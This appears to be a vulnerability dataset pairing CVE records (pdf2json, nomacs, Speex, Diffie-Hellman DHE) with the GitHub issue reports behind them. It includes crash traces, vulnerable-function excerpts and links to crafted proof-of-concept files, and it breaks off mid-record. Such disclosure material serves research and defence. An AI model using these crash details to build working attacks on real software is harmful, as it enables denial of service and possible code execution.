cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2020-23879 | 2021-11-10T22:15:09.783 | pdf2json v0.71 was discovered to contain a NULL pointer dereference in the component ObjectStream::getObject. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2json"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/flexpaper/pdf2json/issues/44"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2json"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/flexpaper/pdf2json/issues/44"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flowpaper:pdf2json:0.71:*:*:*:*:*:*:*",
"matchCriteriaId": "04335321-68D4-408C-A751-7CBE39D6F9FC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/flexpaper/pdf2json/issues/44 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"flexpaper",
"pdf2json"
] | $ ./pdf2json 00-NULL-pointer-dereference-ObjectStream-getObject.pdf
Error (1853): Dictionary key must be a name object
Error (1860): Dictionary key must be a name object
ASAN:SIGSEGV
=================================================================
==88712==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000432f60 bp 0x7ffe1f9cf650 sp 0x7ffe1f9cf5b8 T0)
#0 0x432f5f in ObjectStream::getObject(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:183
#1 0x4345ec in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:841
#2 0x411283 in Object::dictLookup(char*, Object*) /home/test/pdf2json_tmp/xpdf/Object.h:253
#3 0x411283 in Catalog::Catalog(XRef*) /home/test/pdf2json_tmp/xpdf/Catalog.cc:51
#4 0x427fe0 in PDFDoc::setup(GString*, GString*) /home/test/pdf2json_tmp/xpdf/PDFDoc.cc:201
#5 0x42815b in PDFDoc::PDFDoc(GString*, GString*, GString*, void*) /home/test/pdf2json_tmp/xpdf/PDFDoc.cc:101
#6 0x402856 in main /home/test/pdf2json_tmp/src/pdf2json.cc:159
#7 0x7fd2eaec383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#8 0x403788 in _start (/home/test/pdf2json_tmp/src/pdf2json+0x403788)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/pdf2json_tmp/xpdf/XRef.cc:183 ObjectStream::getObject(int, int, Object*)
==88712==ABORTING
ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2json
[00-NULL-pointer-dereference-ObjectStream-getObject.pdf](https://github.com/flexpaper/pdf2json/files/4895900/00-NULL-pointer-dereference-ObjectStream-getObject.pdf)
| NULL-pointer-dereference-ObjectStream-getObject | https://api.github.com/repos/flexpaper/pdf2json/issues/44/comments | 0 | 2020-07-09T09:51:29Z | 2020-07-09T09:51:29Z | https://github.com/flexpaper/pdf2json/issues/44 | 653,926,508 | 44 | 2,778 |
CVE-2020-23884 | 2021-11-10T22:15:09.873 | A buffer overflow in Nomacs v3.15.0 allows attackers to cause a denial of service (DoS) via a crafted MNG file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://github.com/Aurorainfinity/vulnerabilities/blob/master/nomacs/readme.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nomacs/nomacs/issues/516"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://nomacs.org/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://github.com/Aurorainfinity/vulnerabilities/blob/master/nomacs/readme.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nomacs/nomacs/issues/516"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://nomacs.org/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nomacs:nomacs:3.15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AB514AA7-1C7F-4BEF-9F0B-051493D56EAB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/nomacs/nomacs/issues/516 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nomacs",
"nomacs"
] |
Two issues were found in nomacs in all versions. nomacs does not handle the mng file format very well. When nomacs opens a carefully constructed mng file, nomacs will have a buffer overflow and crash
# 1. buffer overflow
++++++++++++++++++++++++++++++++++++++++++++
(71c.f7c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=3ffffc38 edx=045d0000 esi=0425fd80 edi=205d1000
eip=6edc103b esp=03a7f130 ebp=00000000 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\test\Desktop\nomacs-2.4.6-x86-WinXP\imageformats\qmng4.dll -
qmng4+0x2103b:
6edc103b f3ab rep stos dword ptr es:[edi]
0:011> !exploitable -v
!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x205d1000
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Faulting Instruction:6edc103b rep stos dword ptr es:[edi]
Exception Hash (Major/Minor): 0x8c7435c8.0xf37f4977
Hash Usage : Stack Trace:
Major+Minor : qmng4+0x2103b
Instruction Address: 0x000000006edc103b
Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at qmng4+0x000000000002103b (Hash=0x8c7435c8.0xf37f4977)
User mode write access violations that are not near NULL are exploitable.
++++++++++++++++++++++++++++++++++++++++++++
# 2. memory corruption
*************************************************************************
(340.62c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0459e8e1 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=6edbd435 esp=03aef3c4 ebp=04592a58 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010283
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\test\Desktop\nomacs-2.4.6-x86-WinXP\imageformats\qmng4.dll -
qmng4+0x1d435:
6edbd435 880e mov byte ptr [esi],cl ds:0023:00000000=??
0:009> !exploitable -v
!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Faulting Instruction:6edbd435 mov byte ptr [esi],cl
Basic Block:
6edbd435 mov byte ptr [esi],cl
Tainted Input operands: 'cl','esi'
6edbd437 movzx ecx,byte ptr [eax]
6edbd43a mov byte ptr [esi+1],cl
6edbd43d movzx ecx,byte ptr [eax-1]
6edbd441 mov byte ptr [esi+2],cl
6edbd444 movzx ecx,byte ptr [eax+2]
6edbd448 mov byte ptr [esi+3],cl
6edbd44b mov ecx,dword ptr [ebp+248h]
6edbd451 add edx,ecx
6edbd453 add eax,4
6edbd456 lea esi,[esi+ecx*4]
6edbd459 cmp edx,dword ptr [ebp+294h]
6edbd45f jl qmng4+0x1d431 (6edbd431)
Exception Hash (Major/Minor): 0xebb32a1e.0x41bed88a
Hash Usage : Stack Trace:
Major+Minor : qmng4+0x1d435
Major+Minor : qmng4+0x106d
Instruction Address: 0x000000006edbd435
Description: User Mode Write AV near NULL
Short Description: WriteAVNearNull
Exploitability Classification: UNKNOWN
Recommended Bug Title: User Mode Write AV near NULL starting at qmng4+0x000000000001d435
(Hash=0xebb32a1e.0x41bed88a)
User mode write access violations that are near NULL are unknown.
*************************************************************************
| Open a malformed mng format file, buffer overflow and memory corruption will occur. | https://api.github.com/repos/nomacs/nomacs/issues/516/comments | 8 | 2020-07-09T11:28:59Z | 2023-09-12T16:23:11Z | https://github.com/nomacs/nomacs/issues/516 | 653,986,822 | 516 | 2,779 |
CVE-2020-23903 | 2021-11-10T22:15:11.563 | A Divide by Zero vulnerability in the function static int read_samples of Speex v1.2 allows attackers to cause a denial of service (DoS) via a crafted WAV file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xiph/speex/issues/13"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LXCRAYNW5ESCE2PIGTUXZNZHNYFLJ6PX/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3SEV2ZRR47GSD3M7O5PH4XEJMKJJNG2/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/xiph/speex/issues/13"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LXCRAYNW5ESCE2PIGTUXZNZHNYFLJ6PX/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3SEV2ZRR47GSD3M7O5PH4XEJMKJJNG2/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:xiph:speex:1.2:-:*:*:*:*:*:*",
"matchCriteriaId": "A022C12C-6581-4217-AE2D-FEDA32F1E5EF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"369"
] | 369 | https://github.com/xiph/speex/issues/13 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"xiph",
"speex"
] | when speexenc encode wav file , deal with channels 0 will generate a Division by zero error which will cause the software crash
[sample.tar.gz](https://github.com/xiph/speex/files/4910664/sample.tar.gz)
usage :
speexenc sample -
vulnerability function:
static int read_samples(FILE *fin,int frame_size, int bits, int channels, int lsb, short * input, char *buff, spx_int32_t *size)
{
unsigned char in[MAX_FRAME_BYTES*2];
int i;
short *s;
int nb_read;
size_t to_read;
if (size && *size<=0)
{
return 0;
}
to_read = bits/8*channels*frame_size; | speexenc encode wav file dos vulnerability | https://api.github.com/repos/xiph/speex/issues/13/comments | 2 | 2020-07-13T04:52:03Z | 2022-02-11T21:46:30Z | https://github.com/xiph/speex/issues/13 | 655,578,739 | 13 | 2,780 |
CVE-2020-23904 | 2021-11-10T22:15:11.663 | A stack buffer overflow in speexenc.c of Speex v1.2 allows attackers to cause a denial of service (DoS) via a crafted WAV file. NOTE: the vendor states "I cannot reproduce it" and it "is a demo program. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xiph/speex/issues/14"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xiph/speex/issues/14"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:xiph:speex:1.2:-:*:*:*:*:*:*",
"matchCriteriaId": "A022C12C-6581-4217-AE2D-FEDA32F1E5EF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/xiph/speex/issues/14 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xiph",
"speex"
] | I have found a stack buffer overflow vulnerability in speexenc,this may cause a rce by open a crafted wav file
[sample2.zip](https://github.com/xiph/speex/files/4916306/sample2.zip)
the vulnerability function:
speexenc.c:122
} else {
nb_read = fread(in,1,to_read,fin); | speexenc stack buffer overflow | https://api.github.com/repos/xiph/speex/issues/14/comments | 5 | 2020-07-14T03:07:21Z | 2022-01-13T21:43:24Z | https://github.com/xiph/speex/issues/14 | 656,288,229 | 14 | 2,781 |
CVE-2002-20001 | 2021-11-11T19:15:07.380 | The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)at or D(HE)ater attack. The client needs very little CPU resources and network bandwidth. The attack may be more disruptive in cases where a client can require a server to select its largest supported key size. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-506569.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://dheatattack.com"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://dheatattack.gitlab.io/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/Balasys/dheater"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mozilla/ssl-config-generator/issues/162"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://gitlab.com/dheatattack/dheater"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://ieeexplore.ieee.org/document/10374117"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://support.f5.com/csp/article/K83120834"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-004.txt"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.openssl.org/blog/blog/2022/10/21/tls-groups-configuration/"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://www.reddit.com/r/netsec/comments/qdoosy/server_overload_by_enforcing_dhe_key_exchange/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Technical Description"
],
"url": "https://www.researchgate.net/profile/Anton-Stiglic-2/publication/2401745_Security_Issues_in_the_Diffie-Hellman_Key_Agreement_Protocol"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.suse.com/support/kb/doc/?id=000020510"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-506569.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://dheatattack.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://dheatattack.gitlab.io/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/Balasys/dheater"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mozilla/ssl-config-generator/issues/162"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://gitlab.com/dheatattack/dheater"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://ieeexplore.ieee.org/document/10374117"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://support.f5.com/csp/article/K83120834"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-004.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.openssl.org/blog/blog/2022/10/21/tls-groups-configuration/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://www.reddit.com/r/netsec/comments/qdoosy/server_overload_by_enforcing_dhe_key_exchange/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Technical Description"
],
"url": "https://www.researchgate.net/profile/Anton-Stiglic-2/publication/2401745_Security_Issues_in_the_Diffie-Hellman_Key_Agreement_Protocol"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.suse.com/support/kb/doc/?id=000020510"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:balasys:dheater:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DE3F88FC-F039-433B-9035-88F1691DA082",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:siemens:scalance_w1750d_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "065280B2-6EC1-4721-B3D7-EDE44ED4F5BD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:siemens:scalance_w1750d:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FBC30055-239F-4BB1-B2D1-E5E35F0D8911",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:suse:linux_enterprise_server:11:-:*:*:*:*:*:*",
"matchCriteriaId": "F13F07CC-739B-465C-9184-0E9D708BD4C7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:suse:linux_enterprise_server:12:-:*:*:*:*:*:*",
"matchCriteriaId": "15FC9014-BD85-4382-9D04-C0703E901D7A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:suse:linux_enterprise_server:15:*:*:*:*:*:*:*",
"matchCriteriaId": "70A029CD-2AC4-4877-B1A4-5C72B351BA27",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CE73DAA2-9CCA-4BD6-B11A-9326F79D9ABB",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "475E283C-8F3C-4051-B9E8-349845F8C528",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*",
"matchCriteriaId": "956AC9F3-2042-4C21-A5E4-D2D4334D2FC3",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E17DBD3E-F5AC-4A35-81E0-C4804CAD78F9",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "346B71B1-D583-4463-ADF8-BEE700B0CA3A",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2AA25BA-72C5-48A9-BDBC-CA108208011F",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_application_visibility_and_reporting:*:*:*:*:*:*:*:*",
"matchCriteriaId": "308B0070-6716-4754-A5E4-C3D70CAB376B",
"versionEndExcluding": null,
